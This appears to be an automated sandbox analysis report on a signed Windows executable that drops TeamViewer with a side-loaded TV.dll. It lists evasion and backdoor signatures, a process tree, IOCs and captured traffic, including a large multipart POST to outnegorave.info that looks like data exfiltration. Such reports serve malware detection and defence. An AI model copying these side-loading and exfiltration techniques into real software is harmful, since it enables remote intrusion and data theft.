Windows Analysis Report 77Etc0bR2v.bin

Overview

General Information

Sample Name: 77Etc0bR2v.bin (renamed file extension from bin to exe)
Analysis ID: 483795
MD5: e71e3b995477081569ed357e4d403666
SHA1: 809c4cc4ae51fcf3eca24e7d7fa5c1b6b5db52ce
SHA256: 94b9abbe10bd9d6abcb8dce27814992bf7a09ed416c66998bd3496bda1490713
Tags: exe, HartexLLC, signed, soldewornek

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 17
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (window names)
Changes security center settings (notifications, updates, antivirus, firewall)
Creates processes via WMI
DLL side loading technique detected
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Contains functionality to execute programs as a different user
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
EXE planting / hijacking vulnerabilities found
AV process strings found (often used to terminate AV products)
PE file does not import any functions
DLL planting / hijacking vulnerabilities found
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates or modifies windows services
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Contains functionality to delete services
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • 77Etc0bR2v.exe (PID: 5292 cmdline: 'C:\Users\user\Desktop\77Etc0bR2v.exe' MD5: E71E3B995477081569ED357E4D403666)
    • TeamViewer.exe (PID: 2512 cmdline: 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 5568 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • TeamViewer.exe (PID: 1264 cmdline: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 2176 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5316 cmdline: c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'teamviewer.exe' -s USBManager MD5: FA6C268A5B5BDA067A901764D203D433)
  • svchost.exe (PID: 3900 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3488 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1112 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1972 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 2144 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 1412 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6148 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 4012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6408 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • TeamViewer.exe (PID: 6452 cmdline: 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • TeamViewer.exe (PID: 6572 cmdline: 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • TeamViewer.exe (PID: 6592 cmdline: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • TeamViewer.exe (PID: 6656 cmdline: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 6676 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: 77Etc0bR2v.exe, Virustotal: Detection: 37%
Source: 77Etc0bR2v.exe, ReversingLabs: Detection: 37%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll, ReversingLabs: Detection: 26%
Source: 1.2.77Etc0bR2v.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen2
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, Code function: 6_2_0049B32E __EH_prolog3,CryptGenRandom,__CxxThrowException@8,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, Code function: 6_2_0049B4A0 __EH_prolog3_catch,CryptAcquireContextA,__CxxThrowException@8,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, Code function: 6_2_006F605B CryptReleaseContext,

Compliance:

Uses 32bit PE files
Source: 77Etc0bR2v.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
EXE planting / hijacking vulnerabilities found
Source: C:\Users\user\Desktop\77Etc0bR2v.exe, EXE: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
DLL planting / hijacking vulnerabilities found
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: SAMCLI.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: WINMM.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: SHFolder.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe, DLL: VERSION.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: version.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: uxtheme.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe, DLL: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe, DLL: edputil.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe, DLL: C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: iertutil.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe, DLL: urlmon.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe, DLL: SHFOLDER.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\77Etc0bR2v.exe, DLL: CLDAPI.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: winsta.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, DLL: msimg32.dll
Uses secure TLS version for HTTPS connections
Source: unknown, HTTPS traffic detected: 172.67.205.33:443 -> 192.168.2.5:49752 version: TLS 1.2
PE / OLE file has a valid certificate
Source: 77Etc0bR2v.exe, Static PE information: certificate valid
Binary contains paths to debug symbols
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000000.248354539.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000002.524713839.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000002.336944696.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000002.348837191.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.342853199.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000000.345802287.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000000.248354539.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000002.524713839.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000002.336944696.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000002.348837191.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.342853199.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000000.345802287.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.268193262.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000002.536045317.000000006EAFD000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.514763598.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000002.341816195.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000002.362277725.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345987825.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000002.367975860.000000006EAFD000.00000002.00020000.sdmp
Source: C:\Users\user\Desktop\77Etc0bR2v.exe, Code function: 1_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\77Etc0bR2v.exe, Code function: 1_2_0040263E FindFirstFileA,
Source: C:\Users\user\Desktop\77Etc0bR2v.exe, Code function: 1_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, Code function: 3_2_6EAF28B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, Code function: 3_2_6EAF2DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, Code function: 6_2_004BF3A9 __EH_prolog3,GetVolumeInformationW,FindFirstFileW,FindClose,FindFirstFileW,FindClose,GetVolumeInformationW,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, Code function: 6_2_0050331C __EH_prolog3_catch,FindFirstFileW,GetLastError,__CxxThrowException@8,FindClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, Code function: 6_2_6EAF2DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe, Code function: 6_2_6EAF28B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 8_2_6EAF28B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 8_2_6EAF2DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,
Source: global traffic, HTTP traffic detected:
POST /B8C631A8/ HTTP/1.1
Content-Length: 85134
Content-Type: multipart/form-data; boundary=--------3509900953
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: outnegorave.info
Connection: Close
Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
GET /din.aspx?s=00000000&client=DynGate&rnd=10241550&p=10000001 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master15.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
GET /din.aspx?s=39260701&client=DynGate&p=10000002 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master15.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
GET /din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master15.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
GET /din.aspx?s=39260710&client=DynGate&p=10000002 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master15.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
GET /din.aspx?s=39260719&client=DynGate&p=10000002 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master15.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
GET /din.aspx?s=39260736&client=DynGate&p=10000002 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master15.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: 178.255.154.140
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
POST /dout.aspx?s=12652280&p=10000001&client=DynGate HTTP/1.1
Accept: */*
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: 178.255.154.140
Content-Length: 3
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
POST /dout.aspx?s=12652280&p=10000002&client=DynGate HTTP/1.1
Accept: */*
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: 178.255.154.140
Content-Length: 500000
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
GET /din.aspx?s=12652280&m=fast&client=DynGate&p=10000002 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: 178.255.154.140
Connection: Keep-Alive
Cache-Control: no-cache

Source: unknown
TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: svchost.exe, 0000000A.00000002.510538467.000001D426444000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 0000000A.00000002.510538467.000001D426444000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 0000000A.00000002.510538467.000001D426444000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 0000000A.00000002.510463156.000001D426429000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000A.00000002.510463156.000001D426429000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000C.00000003.308300369.000002A41625E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000C.00000003.308381147.000002A416259000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000C.00000002.310813443.000002A41623D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000C.00000003.308381147.000002A416259000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000C.00000003.308381147.000002A416259000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000C.00000002.310813443.000002A41623D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000C.00000003.285739811.000002A416231000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000C.00000002.310885401.000002A416242000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000C.00000002.310885401.000002A416242000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000C.00000003.308492112.000002A416240000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.308381147.000002A416259000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000000C.00000003.308300369.000002A41625E000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000C.00000003.308381147.000002A416259000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000C.00000003.308381147.000002A416259000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000C.00000003.308218425.000002A416263000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.308300369.000002A41625E000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000C.00000002.310813443.000002A41623D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000C.00000003.285739811.000002A416231000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: TeamViewer.exe, 00000006.00000003.384741307.000000000575A000.00000004.00000001.sdmp, TeamViewer.exe, 00000006.00000003.374180078.000000000575A000.00000004.00000001.sdmp, TeamViewer.exe, 00000006.00000003.371647867.000000000575A000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/
Source: TeamViewer.exe, 00000006.00000003.389888887.000000000575A000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/#
Source: TeamViewer.exe, 00000006.00000003.395921982.000000000575A000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/(
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmpString found in binary or memory: https://outnegorave.info/8C631A8/614&p=10000001
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmpString found in binary or memory: https://outnegorave.info/8C631A8/V3e
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmpString found in binary or memory: https://outnegorave.info/8C631A8/icrosoft
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmpString found in binary or memory: https://outnegorave.info/8C631A8/opmentProperties
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmpString found in binary or memory: https://outnegorave.info/8C631A8/opmentProperties:3
Source: TeamViewer.exe, 00000006.00000003.376075558.0000000005749000.00000004.00000001.sdmp, TeamViewer.exe, 00000006.00000003.368823662.000000000575A000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/B8C631A8/
Source: TeamViewer.exe, 00000006.00000003.376075558.0000000005749000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/B8C631A8/4
Source: TeamViewer.exe, 00000006.00000003.378667233.000000000575A000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/B8C631A8/;
Source: TeamViewer.exe, 00000006.00000003.365826240.000000000575A000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/B8C631A8/=
Source: TeamViewer.exe, 00000006.00000003.395921982.000000000575A000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/B8C631A8/W
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmpString found in binary or memory: https://outnegorave.info/B8C631A8/lPanel.dll
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmpString found in binary or memory: https://outnegorave.info/B8C631A8/mViewer
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmpString found in binary or memory: https://outnegorave.info/B8C631A8/opmentProperties
Source: TeamViewer.exe, 00000006.00000003.374180078.000000000575A000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/B8C631A8/q
Source: TeamViewer.exe, 00000006.00000003.365826240.000000000575A000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/G
Source: TeamViewer.exe, 00000006.00000003.365826240.000000000575A000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/S
Source: TeamViewer.exe, 00000006.00000003.365826240.000000000575A000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/e
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmpString found in binary or memory: https://outnegorave.info/ntsSecure-Out)LMEMX
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
Source: svchost.exe, 0000000C.00000002.310813443.000002A41623D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000C.00000002.310085553.000002A416213000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.310813443.000002A41623D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000C.00000003.308749567.000002A416245000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000C.00000003.308749567.000002A416245000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000C.00000003.285739811.000002A416231000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000C.00000003.285739811.000002A416231000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000C.00000002.310305376.000002A416224000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen19
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: TeamViewer.exe, 00000006.00000002.526986525.0000000002610000.00000004.00000001.sdmpString found in binary or memory: https://www.teamviewer.com/buy-now/?utm_medium=masterads&utm_source=master-commercial-use&utm_campai
Source: 77Etc0bR2v.exe, 00000001.00000002.248818109.0000000000409000.00000004.00020000.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmpString found in binary or memory: https://www.teamviewer.com/licensing/order.aspx?lng=ja
Source: unknown HTTP traffic detected: POST /B8C631A8/ HTTP/1.1 Content-Length: 85134 Content-Type: multipart/form-data; boundary=--------3509900953 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: outnegorave.info Connection: Close Cache-Control: no-cache
Source: unknown DNS traffic detected: queries for: ping3.dyngate.com
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF5A00 InternetOpenA,InternetOpenUrlA,CreateFileA,InternetReadFile,WriteFile,InternetReadFile,WriteFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,
